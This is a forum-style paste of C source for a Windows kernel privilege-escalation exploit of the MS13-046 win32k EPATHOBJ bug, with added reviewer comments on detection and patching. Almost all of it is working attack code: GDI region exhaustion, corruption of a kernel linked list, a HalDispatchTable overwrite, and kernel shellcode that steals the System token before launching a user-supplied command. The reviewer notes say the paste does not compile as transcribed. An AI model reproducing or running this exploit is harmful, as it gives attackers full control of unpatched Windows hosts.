留此代码备用:“

/*
 * thanks to: Tavis Ormandy & ProgmBoy & instruder
 * by boywhp@126.com
 * build by WDK7600
 * tested on windows 2003 x64 en
 * - 1.ImageBase=0x10000
 * - 2.wdk makefile.new disable DYNAMICBASE_FLAG=/dynamicbase
 */

//
// Reviewer notes (defensive context):
// - Local privilege-escalation proof of concept for the
//   win32k!EPATHOBJ::pprFlattenRec bug addressed by MS13-046; per the header
//   above it was built with WDK 7600 and tested on Windows 2003 x64, a
//   platform that is long out of support. Mitigation is the MS13-046 update.
// - Observable host behaviour that detection engineering can key on, all of it
//   visible in the code below: a user-mode process creates a desktop named
//   "DontPanic", allocates HRGN objects until CreateRoundRectRgn() fails,
//   queries SystemModuleInformation (class 11) and LoadLibraryA()s the first
//   module it lists, calls NtReadVirtualMemory/NtQueryIntervalProfile from
//   ntdll directly, then spawns the command line given as argv[1].
// - The paste is whitespace-mangled (several statements and comments were
//   glued onto single lines). Line breaks were restored and comments added;
//   no code tokens were changed.
//

#include <stdlib.h>
#include <stdio.h>
#include <STDARG.H>
#include <stddef.h>
#include <windows.h>
#include <Shellapi.h>
//#include <ntstatus.h>

#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")

#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000

// Marks the .text section Execute+Read+Write (a W^X violation a reviewer
// would flag). The page does not say why the PoC needs it.
#pragma comment(linker, "/SECTION:.text,ERW")

//
// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
//
// Tavis Ormandy <taviso () cmpxchg8b com>, March 2013
//

// Global state shared between do_expoite() and WatchdogThread().
POINT       Points[MAX_POLYPOINTS];
BYTE        PointTypes[MAX_POLYPOINTS];
HRGN*       pRegions = NULL;        // grows by realloc() in do_expoite()
ULONG       MaxRegions = 0;         // capacity of pRegions
ULONG       NumRegion = 0;          // HRGNs actually created
HANDLE      Mutex;                  // held by main thread; watchdog waits on it

// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH   0x00000001
#define PD_ENDSUBPATH     0x00000002
#define PD_RESETSTYLE     0x00000004
#define PD_CLOSEFIGURE    0x00000008
#define PD_BEZIERS        0x00000010

#define ENABLE_SWITCH_DESKTOP        1   // defined but not referenced below

typedef struct  _POINTFIX
{
    ULONG x;
    ULONG y;
} POINTFIX, *PPOINTFIX;

// Approximated from reverse engineering.
typedef struct _PATHRECORD {
    struct _PATHRECORD *next;
    struct _PATHRECORD *prev;
    ULONG               flags;
    ULONG               count;
    POINTFIX            points[4];
} PATHRECORD, *PPATHRECORD;

// User-space path records: PathRecord is the self-linked node the kernel is
// expected to pick up, ExploitRecord/ExploitRecordExit the replacement chain
// the watchdog swaps in.
PPATHRECORD PathRecord;
PATHRECORD  ExploitRecord = {0};
PPATHRECORD ExploitRecordExit;

// Layout used to read SystemModuleInformation (class 11) in main().
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;                 // Not filled in
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

// ntdll entry points resolved at runtime in main() ...
typedef INT ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef INT ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef INT ( __stdcall *NtReadVirtualMemory_)( HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
// ... and kernel exports whose addresses are rebased from a user-mode
// LoadLibraryA() of the kernel image onto the live ImageBase.
typedef PVOID (__stdcall *PsGetCurrentProcess_)();
typedef PVOID (__stdcall *PsReferencePrimaryToken_)(PVOID Process);
typedef INT (__stdcall *PsLookupProcessByProcessId_)(HANDLE ProcessId, PVOID *Process);

NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtQuerySystemInformation_ NtQuerySystemInformation;
NtReadVirtualMemory_ NtReadVirtualMemory;

//#define __SHELL_CODE_MAGIC        0x11223344AABBCCDD

// Everything ShellCode() needs once it runs in kernel context; filled in by
// main() and passed by address through NtQueryIntervalProfile().
typedef struct _ShellCodeInfo
{
    PVOID* MmUserProbeAddress;
    PVOID* WriteToHalDispatchTable;   // HalDispatchTable + sizeof(PVOID)
    PVOID  NtSetEaFile;               // value written back into that slot
    PVOID* PsInitialSystemProcess;
    DWORD  Pid;                       // only used by the commented-out lookup
    PsGetCurrentProcess_ PsGetCurrentProcess;
    PsLookupProcessByProcessId_ PsLookupProcessByProcessId;
    PsReferencePrimaryToken_ PsReferencePrimaryToken;
} ShellCodeInfo, *PShellCodeInfo;

ShellCodeInfo GlobalInfo;

// Low bits of a token FAST_REF that hold the reference count; masked off when
// comparing process-object words against the System token below.
#if defined (_WIN64)
#define MAX_FAST_REFS 15
#else
#define MAX_FAST_REFS 7
#endif

/*
 * Executed in kernel context after do_expoite() has placed its address in the
 * HalDispatchTable slot and called NtQueryIntervalProfile(). pInfo is the
 * GlobalInfo pointer that call passes through; x, y and w are the remaining
 * dispatch arguments and are unused. It resets *MmUserProbeAddress (the
 * original comment calls this a FIX), repoints the patched dispatch slot at
 * NtSetEaFile, then walks the current process object and the System process
 * object in lock-step until the word holding the System token (FAST_REF low
 * bits masked) is found and writes that token into the current process.
 * Returns 0xC0000018 to the NtQueryIntervalProfile() caller.
 */
int __stdcall ShellCode(PVOID x, PVOID y, PShellCodeInfo* pInfo, PVOID w)
{
    PShellCodeInfo info; //__SHELL_CODE_MAGIC;
    PVOID targetProcess, sysProcess, token;
    ULONG_PTR *p1, *p2;

    info = *pInfo;
#ifdef _WIN64
    /* FIX MmUserProbeAddress -> ((ULONG_PTR)(0x80000000000UI64 - 0x10000)) */
    *info->MmUserProbeAddress = ((ULONG_PTR)(0x80000000000UI64 - 0x10000));
#else
    *info->MmUserProbeAddress = 0x7fff0000;
#endif
    /* x64: 4 args in rcx, rdx, r8, r9 - a bare ret (0xc3) is enough */
    *info->WriteToHalDispatchTable = info->NtSetEaFile;

    // Earlier variant targeted a process by Pid; the current code acts on the
    // calling process instead.
    //if (info->PsLookupProcessByProcessId(info->Pid, &targetProcess) != 0)
    //        return 0xC0000019;
    p1 = targetProcess = info->PsGetCurrentProcess();
    p2 = sysProcess = *info->PsInitialSystemProcess;
    token = info->PsReferencePrimaryToken(sysProcess);

    /* token 4bit->refcnt */
    // No upper bound on the walk: if the token word is never matched this
    // keeps reading past both objects.
    while ((*p2 & ~MAX_FAST_REFS) != token)
    {
        p1++;
        p2++;
    }
    *p1 = token;

    return 0xC0000018;
}

/*
 * Watchdog started by do_expoite(). Parameter is unused. If Mutex (created
 * owned by the main thread) is not released within CYCLE_TIMEOUT ms, the main
 * thread is assumed to be blocked inside FlattenPath(); the HRGN ballast is
 * freed and PathRecord->next is swapped from itself to &ExploitRecord, which
 * is the change the main thread's loop later tests for.
 */
DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
    //
    // This routine waits for a mutex object to timeout, then patches the
    // compromised linked list to point to an exploit. We need to do this.
    //
    printf("Watchdog thread %d waiting on Mutex\n", GetCurrentThreadId());

    if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
        //
        // It looks like the main thread is stuck in a call to FlattenPath(),
        // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
        // up, and then patch the list to trigger our exploit.
        //
        while (NumRegion--)
            DeleteObject(pRegions[NumRegion]);

        printf("InterlockedExchangePointer(0x%p, 0x%p);\n", &PathRecord->next, &ExploitRecord);

        InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
    } else {
        printf("Mutex object did not timeout, list not patched\n");
    }

    return 0;
}

/*
 * One attempt at the trigger. addr becomes ExploitRecord.prev (main() passes
 * GlobalInfo.MmUserProbeAddress); val, cmd and argv are accepted but never
 * read. Builds the user-space path records, exhausts GDI region allocation,
 * then repeatedly draws and flattens a bezier path made of PathRecord's
 * address until PathRecord->next is observed to have changed. Returns -1 if
 * that never happens, otherwise the NtReadVirtualMemory() status, or 0 when
 * that call succeeded and NtQueryIntervalProfile() was invoked.
 */
static int do_expoite(PVOID* addr, PVOID val, PBYTE cmd, PBYTE argv)
{
    HDC     Device;
    HDESK   Desk;
    ULONG   PointNum;
    HANDLE  Thread;
    ULONG   Size;
    INT     ret = -1;
    PBYTE   tmp = NULL;

    //
    // Create our PATHRECORD in user space we will get added to the EPATHOBJ
    // pathrecord chain.
    //
    PathRecord = (PPATHRECORD)VirtualAlloc(NULL, sizeof(PATHRECORD),
                                           MEM_COMMIT | MEM_RESERVE,
                                           PAGE_EXECUTE_READWRITE);
    memset(PathRecord, sizeof(PATHRECORD), 0xCC);

    //
    //PathRecord->next = self //stuck here to wait for WatchdogThread set PathRecord->next = ExploitRecord
    //
    PathRecord->next    = PathRecord;
    PathRecord->prev    = (PPATHRECORD)(0x42424242);
    PathRecord->flags   = 0;

    //init ExploitRecordExit node
    ExploitRecordExit = (PPATHRECORD)VirtualAlloc(NULL, sizeof(PATHRECORD),
                                                  MEM_COMMIT | MEM_RESERVE,
                                                  PAGE_EXECUTE_READWRITE);
    ExploitRecordExit->next = NULL;
    ExploitRecordExit->next = NULL;
    ExploitRecordExit->flags = PD_BEGINSUBPATH;
    ExploitRecordExit->count = 0;

    //
    //ensue ExploitRecord.next -> valid address and end record
    //ExploitRecord.next -> ExploitRecordExit node
    //
    ExploitRecord.next  = (PPATHRECORD)ExploitRecordExit;
    ExploitRecord.prev  = (PPATHRECORD)addr;
    ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH;
    ExploitRecord.count = 4;

    printf("Alllocated PATHRECORDS:%p %p %p\n", PathRecord, ExploitRecord, ExploitRecordExit);
    // Scratch buffer sized by the *address* of ShellCode; this relies on the
    // fixed low ImageBase noted in the header, and the same value is reused as
    // the read length below.
    tmp = malloc((int)ShellCode);
    printf("tmp->%p\n", tmp);
    printf("Creating complex bezier path with %x\n", (ULONG)(PathRecord) >> 4);

    //
    // Generate a large number of Belier Curves made up of pointers to our
    // PATHRECORD object.
    //
    for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
#ifdef _WIN64
        Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
        Points[PointNum].y      = 0;//(ULONG)(PathRecord) >> 4;
#else
        Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
        Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
#endif
        PointTypes[PointNum]    = PT_BEZIERTO;
    }

    //
    // Switch to a dedicated desktop so we don't spam the visible desktop with
    // our Lines (Not required, just stops the screen from redrawing slowly).
    //
    Desk = CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL);
    SetThreadDesktop(Desk);

    MaxRegions = MAX_REGIONS;
    pRegions = realloc(NULL, sizeof(HRGN) * MaxRegions);
    Mutex = CreateMutex(NULL, TRUE, NULL);   // created owned; released only on the fall-through path
    Device = GetDC(NULL);

    //
    // Spawn a thread to cleanup
    //
    Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);

    //
    // We need to cause a specific AllocObject() to fail to trigger the
    // exploitable condition. To do this, I create a large number of rounded
    // rectangular regions until they start failing. I don't think it matters
    // what you use to exhaust paged memory, there is probably a better way.
    //
    // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
    // failure. Seriously, do some damn QA Microsoft, wtf.
    //
    // NOTE(review): in this paste the for-loop header is commented out, so the
    // closing brace after the while loop has no opener and Size is never
    // assigned before use; the text does not compile as transcribed.
    //        //for (Size = 1 << 26; Size; Size >>= 1) {
    while (pRegions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
    {
        NumRegion++;
        if (NumRegion >= MaxRegions)
        {
            MaxRegions = MaxRegions*2;
            pRegions = realloc(pRegions, sizeof(HRGN) * MaxRegions);
        }
    }
    }

    printf("Allocated %u/%u HRGN objects\n", NumRegion, MaxRegions);
    printf("Flattening curves...\n");

    //
    // Begin filling the free list with our points.
    //
    for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
        BeginPath(Device);
        PolyDraw(Device, Points, PointTypes, PointNum);
        EndPath(Device);
        FlattenPath(Device);
        FlattenPath(Device);

        // Set by WatchdogThread() once the main thread has been blocked in
        // FlattenPath() for CYCLE_TIMEOUT ms.
        if (PathRecord->next != PathRecord)
        {
            // Self-read of tmp; the byte-count out-pointer is the kernel
            // address stored in GlobalInfo.WriteToHalDispatchTable.
            ret = NtReadVirtualMemory((HANDLE)-1, tmp, tmp, (SIZE_T)ShellCode, GlobalInfo.WriteToHalDispatchTable);
            if (ret == 0)
            {
                printf("[*] exploit... %p!\n", &GlobalInfo);
                NtQueryIntervalProfile(&GlobalInfo, &ret);
                ret = 0;
            }
            break;
        }

        EndPath(Device);
    }

    printf("cleaning up...\n");

    //
    // If we reach here, we didn't trigger the condition. Let the other thread know.
    //
    ReleaseMutex(Mutex);
    CloseDesktop(Desk);
    ReleaseDC(NULL, Device);
    WaitForSingleObject(Thread, INFINITE);
    VirtualFree(PathRecord, sizeof(PATHRECORD), MEM_RELEASE);
    VirtualFree(ExploitRecordExit, sizeof(PATHRECORD), MEM_RELEASE);
    free(tmp);
    free(pRegions);
    CloseHandle(Thread);

    return ret;
}

/*
 * Entry point. argv[1] is the command line to launch afterwards; argv[2] is
 * forwarded to do_expoite() but never read there. Resolves the three ntdll
 * calls, reads the loaded-module list to learn the kernel's image name and
 * base, LoadLibraryA()s that image in user mode to resolve the exports listed
 * in ShellCodeInfo and rebases them onto the live kernel base, then loops on
 * do_expoite() until it returns 0 and finally CreateProcess()es argv[1].
 * Returns 0 on success, -1 on any early failure.
 */
int main(int argc, char **argv)
{
    HMODULE ntoskrnl = NULL;
    LONG ret;
    BOOL bRet = FALSE;
    HMODULE  ntdll;
    // mod initially aliases its own stack slot so the first, deliberately
    // undersized query has somewhere to write.
    PRTL_PROCESS_MODULES mod = (PRTL_PROCESS_MODULES)&mod;
    PBYTE osBase;
    HMODULE hDllOs;
    ULONG NeededSize;
    INT expCount = 0;
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};

    si.cb = sizeof(si);
    //GlobalInfo.Pid = GetCurrentProcessId(); //pi.dwProcessId;

    ntdll = GetModuleHandle("ntdll.dll");
    NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress(ntdll, "NtQueryIntervalProfile");
    NtQuerySystemInformation = (NtQuerySystemInformation_)GetProcAddress(ntdll, "NtQuerySystemInformation");
    NtReadVirtualMemory = (NtReadVirtualMemory_)GetProcAddress(ntdll, "NtReadVirtualMemory");
    if (!NtQueryIntervalProfile || !NtQuerySystemInformation|| !NtReadVirtualMemory)
    {
        printf("error get ntdll fun address\n");
        return -1;
    }

    /*
     * NtQuerySystemInformation query sys module info
     * STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
     */
    ret = NtQuerySystemInformation(11, mod, 4, &NeededSize);
    if (0xC0000004 == ret)
    {
        mod = malloc(NeededSize);
        ret = NtQuerySystemInformation(11, mod, NeededSize, NULL);
    }
    // Neither the non-mismatch first status nor the second call's status is
    // checked before Modules[0] is dereferenced.

    printf("ntos:%s->%p\n", mod->Modules[0].FullPathName + mod->Modules[0].OffsetToFileName, mod->Modules[0].ImageBase);
    osBase = mod->Modules[0].ImageBase;
    hDllOs = LoadLibraryA((LPCSTR)(mod->Modules[0].FullPathName + mod->Modules[0].OffsetToFileName));
    if (!hDllOs)
    {
        printf("error reload os kernel\n");
        return -1;
    }
    free(mod);

    // export RVA in the user-mode mapping + live kernel base = kernel address
    GlobalInfo.WriteToHalDispatchTable = (PBYTE)GetProcAddress(hDllOs, "HalDispatchTable") - (PBYTE)hDllOs + osBase + sizeof(PVOID);
    GlobalInfo.PsInitialSystemProcess = (PBYTE)GetProcAddress(hDllOs, "PsInitialSystemProcess") - (PBYTE)hDllOs + osBase;
    GlobalInfo.PsReferencePrimaryToken = (PBYTE)GetProcAddress(hDllOs, "PsReferencePrimaryToken") - (PBYTE)hDllOs + osBase;
    GlobalInfo.PsGetCurrentProcess = (PBYTE)GetProcAddress(hDllOs, "PsGetCurrentProcess") - (PBYTE)hDllOs + osBase;
    GlobalInfo.PsLookupProcessByProcessId = (PBYTE)GetProcAddress(hDllOs, "PsLookupProcessByProcessId") - (PBYTE)hDllOs + osBase;
    GlobalInfo.MmUserProbeAddress = (PBYTE)GetProcAddress(hDllOs, "MmUserProbeAddress") - (PBYTE)hDllOs + osBase;
    GlobalInfo.NtSetEaFile = (PBYTE)GetProcAddress(hDllOs, "NtSetEaFile") - (PBYTE)hDllOs + osBase;

    printf("HalDispatchTable - %p MmUserProbeAddress - %p NtSetEaFile - %p \n", GlobalInfo.WriteToHalDispatchTable, GlobalInfo.MmUserProbeAddress, GlobalInfo.NtSetEaFile);

    // expCount is never incremented, so the 0x10 cap below is never reached
    // and this loop only ends when do_expoite() returns 0.
    while (do_expoite(GlobalInfo.MmUserProbeAddress, NULL, argv[1], argc > 2 ? argv[2] : NULL) != 0)
    {
        if (expCount > 0x10)
            break;
    }

    printf("[*]exe %s\n", argv[1]);
    if (!CreateProcess(NULL,        // No module name (use command line)
                       argv[1],
                       NULL,
                       NULL,
                       FALSE,
                       0,                      //CREATE_NEW_CONSOLE | CREATE_SUSPENDED,
                       NULL,
                       NULL,
                       &si,
                       &pi))
    {
        printf("CreateProcess failed (%d)./n", GetLastError());
        return -1;
    }

    //ResumeThread(pi.hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return 0;
}
